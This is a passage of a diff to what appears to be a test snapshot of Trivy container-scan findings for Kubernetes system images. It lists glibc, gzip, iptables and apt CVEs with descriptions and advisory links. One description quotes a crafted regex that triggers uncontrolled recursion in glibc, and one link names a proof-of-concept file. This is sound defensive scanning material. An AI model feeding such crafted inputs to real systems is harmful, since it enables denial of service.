"https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.10-4+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "1.10-4", - "packageName": "gzip", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", - ], - }, - "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-6096", + "installedVersion": "2.28-10", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-6096", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://ubuntu.com/security/notices/USN-4954-1", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + ], + }, + "category": "Vulnerability", + "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://avd.aquasec.com/nvd/cve-2020-6096", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://access.redhat.com/security/cve/CVE-2020-6096", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://ubuntu.com/security/notices/USN-4954-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "iptables", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3326", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "https://access.redhat.com/security/cve/CVE-2021-3326", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "https://linux.oracle.com/cve/CVE-2021-3326.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210304-0007/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2021-3326", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://access.redhat.com/security/cve/CVE-2021-3326", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "libapt-pkg6.0", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5699-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", + "installedVersion": "2.28-10", "packageName": "libc-bin", "references": [ "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", @@ -77088,7 +79086,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ @@ -77165,540 +79163,473 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-10228", + "installedVersion": "2.28-10", "packageName": "libc-bin", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "http://openwall.com/lists/oss-security/2017/03/01/10", + "http://www.securityfocus.com/bid/96525", + "https://access.redhat.com/security/cve/CVE-2016-10228", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "https://linux.oracle.com/cve/CVE-2016-10228.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "glibc: iconv program can hang when invoked with the -c option", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://avd.aquasec.com/nvd/cve-2016-10228", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "http://openwall.com/lists/oss-security/2017/03/01/10", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "http://www.securityfocus.com/bid/96525", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://access.redhat.com/security/cve/CVE-2016-10228", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", - ], - }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-25013", + "installedVersion": "2.28-10", "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "https://access.redhat.com/security/cve/CVE-2019-25013", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "https://linux.oracle.com/cve/CVE-2019-25013.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210205-0004/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://avd.aquasec.com/nvd/cve-2019-25013", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://access.redhat.com/security/cve/CVE-2019-25013", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - 